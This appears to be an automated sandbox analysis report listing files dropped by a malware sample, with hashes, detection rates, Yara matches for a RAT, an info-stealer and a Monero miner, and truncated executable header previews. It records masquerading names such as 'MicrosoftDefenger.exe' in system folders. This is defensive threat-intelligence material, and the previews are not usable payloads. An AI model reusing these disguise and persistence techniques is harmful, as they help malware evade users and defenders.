                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\sPPOvTaE.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):70144
                                                                                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\syIwhxhC.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):36352
                                                                                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\tvjECxvw.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):342528
                                                                                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\vrXfSuSA.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89600
                                                                                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                                                                                  C:\Windows\Bridgeprovider.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\1.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3766784
                                                                                                                                                                                                  Entropy (8bit):7.8288998084696235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:SUZpV+/6tPv1Vjlr1VdlhrnKSiOIwSTLvCGj0oXcR6VQ1oB3RobzRk5A5v4ses:SevbR5ltKSiOIZfC9o63oBKk5A5vD
                                                                                                                                                                                                  MD5:BF9DDFDD875FA2BADBE94E88A1FC4214
                                                                                                                                                                                                  SHA1:8730687161C402B4586A61968E7BEC1D17B7E29A
                                                                                                                                                                                                  SHA-256:8E35B4E95AFF45AC48B79D7359F31CE871B5D952D3C0F51D500929FEE0442D06
                                                                                                                                                                                                  SHA-512:B823653024D225B39A609DD844EF203F243A9BDAC1C89FF4EB11C355D09420CEA6EB3B0F713817D65AA506F8F5D0B809EEE3F694F71364D2170403E3980B0BBF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................r9..........9.. ....9...@.. ........................9...........@...................................9.K.....9.p.....................9...................................................... ............... ..H............text....p9.. ...r9................. ..`.rsrc...p.....9......t9.............@....reloc........9......x9.............@..B..................9.....H...................l.............9......................................0..........(.... ........8........E....M...N...).......8H...(.... ....~....{....:....& ....8....(.... ....~....{b...9....& ....8....*(.... ....~....{|...9....& ....8y......0..)....... ........8........E............6...........Z...8....r...ps....z*...... ....~....{q...:....& ....8....8.... ....~....{h...:....& ....8........~....(C...~....(G... ....<.... ....8]...~....:.... ....~....{....:?...& ....84...~.

                                                                                                                                                                                                  C:\Windows\INF\7da2ce7d90598e

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):212
                                                                                                                                                                                                  Entropy (8bit):5.708713708020551
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:7k4ty1d9c8qKKSOJrenpCUmazzKdFVxzVVH/avXAry/4fyk9V1k1fzj3JO1tVgA:7XtibTqKKSJnp2mKnVVCIaCezj3kP
                                                                                                                                                                                                  MD5:121505A159FAAA411EFD50112B75B55D
                                                                                                                                                                                                  SHA1:55BB4F4585A8C5D68DF06F28333B325D65B219A7
                                                                                                                                                                                                  SHA-256:1A7BE99A73F12DF405FB871EDCEF678F1B32E28CA670B0DB142F59CC910A227B
                                                                                                                                                                                                  SHA-512:80EFFF86556060524FF8839CB0471D3A938E9063DBDF817640A0CE8BD78D3CFF601EBC03D89B2473B01C8F2B1720A07A8C1F04110F1AA2077D0739620563F7F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:ktaOoGz5HWwFJvnO28XSAP3cfXPJrYfooWdk6czFnjgVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobthAzAlBiSCRcKIu7tiO7VweTOjWF0pTEgvlS73PQppbz08mJSVqlDrF6DrkbO5smsN6Zgc90S7SqVpdP6Mwe9sAzppPQSyBt6zGmCNn0V0SFZZlXOVeBJNmAMHt1Mthe6itgi0Ms

                                                                                                                                                                                                  C:\Windows\INF\MicrosoftDefenger.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3766784
                                                                                                                                                                                                  Entropy (8bit):7.8288998084696235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:SUZpV+/6tPv1Vjlr1VdlhrnKSiOIwSTLvCGj0oXcR6VQ1oB3RobzRk5A5v4ses:SevbR5ltKSiOIZfC9o63oBKk5A5vD
                                                                                                                                                                                                  MD5:BF9DDFDD875FA2BADBE94E88A1FC4214
                                                                                                                                                                                                  SHA1:8730687161C402B4586A61968E7BEC1D17B7E29A
                                                                                                                                                                                                  SHA-256:8E35B4E95AFF45AC48B79D7359F31CE871B5D952D3C0F51D500929FEE0442D06
                                                                                                                                                                                                  SHA-512:B823653024D225B39A609DD844EF203F243A9BDAC1C89FF4EB11C355D09420CEA6EB3B0F713817D65AA506F8F5D0B809EEE3F694F71364D2170403E3980B0BBF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\INF\MicrosoftDefenger.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\INF\MicrosoftDefenger.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................r9..........9.. ....9...@.. ........................9...........@...................................9.K.....9.p.....................9...................................................... ............... ..H............text....p9.. ...r9................. ..`.rsrc...p.....9......t9.............@....reloc........9......x9.............@..B..................9.....H...................l.............9......................................0..........(.... ........8........E....M...N...).......8H...(.... ....~....{....:....& ....8....(.... ....~....{b...9....& ....8....*(.... ....~....{|...9....& ....8y......0..)....... ........8........E............6...........Z...8....r...ps....z*...... ....~....{q...:....& ....8....8.... ....~....{h...:....& ....8........~....(C...~....(G... ....<.... ....8]...~....:.... ....~....{....:?...& ....84...~.

                                                                                                                                                                                                  C:\Windows\System32\CSCD2E84F4C387140E5AF80638E7ED67168.TMP

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1224
                                                                                                                                                                                                  Entropy (8bit):4.435108676655666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                                                                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4608
                                                                                                                                                                                                  Entropy (8bit):3.9313043186404797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:6IJXPtKM7Jt8Bs3FJsdcV4MKe27QNvqBHqOulajfqXSfbNtm:TPRPc+Vx9MQNvkUcjRzNt
                                                                                                                                                                                                  MD5:6EF2491B34267761F9A9BC17D13C6931
                                                                                                                                                                                                  SHA1:864496FF6F6A1BD1A34A4BD206755E12F8708E4D
                                                                                                                                                                                                  SHA-256:4F7821DC9089BA81122FC1EE8F2C50885ED68E9E6CE4CB98F01B74AE59B0D6CC
                                                                                                                                                                                                  SHA-512:F02BF61C73526B5EEE4B949CC4986751AF30497AA1369D8CA8D051865BAB9B442466234BA20F14784918ED445760ABCC09051B93D00D9076785B44E8AED14EAD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'Vg.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\1.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4088537
                                                                                                                                                                                                  Entropy (8bit):7.783200094627012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:IBJ+UZpV+/6tPv1Vjlr1VdlhrnKSiOIwSTLvCGj0oXcR6VQ1oB3RobzRk5A5v4sO:ycevbR5ltKSiOIZfC9o63oBKk5A5vDE
                                                                                                                                                                                                  MD5:E94C69B02CC5FB2B03FC32AA55760AAF
                                                                                                                                                                                                  SHA1:6B6D2DCC5302F276EF2141AE0CC704590E498874
                                                                                                                                                                                                  SHA-256:26A3EDC7520A5E70960C14EB1E2F8084A5092A8971BF8EE15488816C9B7138C4
                                                                                                                                                                                                  SHA-512:80BFF5037DD8052B1CC99C6174F95D31BF1A4CAFAC224474FF4E74271B5F5DE9C5AB8A6CB4E0BC8E701FAF4B282CBF45FD98BD13A71DE16970040D3747AFEF9D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Tasks\1.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\ApplicationsFrameHost.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5721088
                                                                                                                                                                                                  Entropy (8bit):6.669821521266325
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:IXC8d5L4wN+UIcPXBGHIhZgprpw82OiONkP1v8P6kF+llT5FQ3YeQOaVYd1:P45Lgw8LiONw0P+llT5FCGRVYz
                                                                                                                                                                                                  MD5:93CEEF4357070A8DDC0BEAC173547EC1
                                                                                                                                                                                                  SHA1:1E9BF45A790B5A818730DE750DC6E2FFE6C35F7C
                                                                                                                                                                                                  SHA-256:4D084A7E0C656D038D3176E97A4F807D094CE78F6B1F92A6ADA7B93CF6A7CF03
                                                                                                                                                                                                  SHA-512:611C22D55F2830F0556170144D6E0BE64CF5BBD6EBE80323CF2944FE8860C9BABAC9439BFF75626E10499B012C178FEAE3D80FE9939FEC402115C3F184825CF6
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: Florian Roth
                                                                                                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, Author: ditekSHen
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........z..........p.....p.._....n......n......n.......tg....p.....Dn.....p............En......Dn.....Dn.....Dne..........Dn.....Rich............................PE..d...7A.e..........".......:..>G.....dx6........@..........................................`.................................................|fQ......0........|..............0..L.....N.......................N.(.....N.8............0:.X............................text...|.:.......:................. ..`.rdata...Y...0:..Z....:.............@..@.data.....+...Q......rQ.............@....pdata........|......|R.............@..@_RANDOMXV.....~.......T.............@..`_TEXT_CN.&....~..(....T.............@..`_TEXT_CN..............T.............@..`_RDATA....... ........T.............@..@.rsrc........0........T.............@..@.reloc..L....0........V.............@..B................................

                                                                                                                                                                                                  C:\Windows\Tasks\IntelConfigService.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1936896
                                                                                                                                                                                                  Entropy (8bit):7.195575658711872
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:CkxOm+7TjsPnztyDMma7hZX228vo41ZUKZn:CJotyDIX228vo41Zt
                                                                                                                                                                                                  MD5:58E4115267B276452EDC1F541E3A8198
                                                                                                                                                                                                  SHA1:EC40B6CCE5C9A835563C17DA81997E8010AC9CAD
                                                                                                                                                                                                  SHA-256:713120BAC7807F6FC0A6050135556C0614A66BE2FB476CFE163877F3D03B4D08
                                                                                                                                                                                                  SHA-512:3DEF4B7F7FBEAB01826EB733174BCA64860F8BFBAD3BAEC361B65B07B4558E28830FCC2DEB264622199F9474277F04E562830BC5F0BF8A0E7932D002F1A812C5
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 56%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d...(f ]..........".................,..........@............................. ............`...@...............@.............................h...|................i..............|.......................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i.......j..................@..@.rsrc.... ...........j..............@..@.reloc..|...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\MSTask.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8939797
                                                                                                                                                                                                  Entropy (8bit):7.993167087932813
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:196608:zWvrHlfID0pUzPLhQNQm8NkKeVuWJysVYvsODoyMxxvjDDAxM8DJuqiX:qjHlXpUTLfhJxWJ0oyMxtDDAxM8tu9X
                                                                                                                                                                                                  MD5:92A9C0EF09F955F9F1BCA837D7AA493F
                                                                                                                                                                                                  SHA1:9292E187F09C271393BE635220A75B11C03C469D
                                                                                                                                                                                                  SHA-256:95C101A0164AF189CC282EB2D67E143B42E6D57D7EF396D59715A355A3162B96
                                                                                                                                                                                                  SHA-512:C906DB5CEC598254D5584040B02DFB7B813B94D63AF6AF90F3AB7014A89409677D6CA78D4F544B3415058C09BA6C972E7CF8DA4B1AA04F954A4689B4A70CBF3F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1_..P1..P1..P1..(2..P1..(4.|P1..(5..P1../..P1../4..P1../5..P1../2..P1..(0..P1..P0..P1...5..P1...3..P1.Rich.P1.........................PE..d...c..e.........."....%.....l................@.....................................>....`.....................................................P....`..h.... ..."...........p..\...P...................................@...............x............................text............................... ..`.rdata...).......*..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...h....`......................@..@.reloc..\....p......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\MicrosoftPrt.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34208376
                                                                                                                                                                                                  Entropy (8bit):7.9976397266318
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:786432:Oo0DUdQuhK/+CGLuoDarzoMQQC5RxAOd99JW88D/N3R:Oo0DU0e3arzSQCnx9JWxb
                                                                                                                                                                                                  MD5:02484A615E581A9A431E20DF300FAED4
                                                                                                                                                                                                  SHA1:D855E2C9338B1508577B3E831CC89838C2768647
                                                                                                                                                                                                  SHA-256:16D2F6194D1B1989FBEF4572055DBF62A0D6A2570B316AC15722192F1C559A50
                                                                                                                                                                                                  SHA-512:7B69E3E47863EC7EDFA03FA1F25A15C90EE84AEC520FF08D8834B010EB58532F444DAA81056B3DCC7D77F42EB0F390B8490CB59A705FA24B6674A088D796FE57
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-@.`~@.`~@.`~..c.G.`~..e...`~..d.J.`~...~D.`~..e.h.`~..d.Q.`~..c.I.`~..a.K.`~@.a~..`~.d.T.`~.b.A.`~Rich@.`~........................PE..d....)Xe.........."....!.....l................@.............................@......).....`.....................................................x.... ........... ...........0..X... ...................................@............................................text...P........................... ..`.rdata...*.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\Superfetch.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702912
                                                                                                                                                                                                  Entropy (8bit):6.862639031766079
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:kRaZROMOm8FN7TjsPnzt2heeRhQbJEOeamwdKJeSPu6bMo0E37O9ug+:ikxOm+7TjsPnztyDMmarwJJKZn
                                                                                                                                                                                                  MD5:362FFCE5C7C480702A615F1847191F62
                                                                                                                                                                                                  SHA1:75ACEAEA1DFBA0735212C2AB5CAFC49257927F73
                                                                                                                                                                                                  SHA-256:9E24C7B4604AA3022325B62154AC80DC76533FA96A3418D8E15D28C998FB9C53
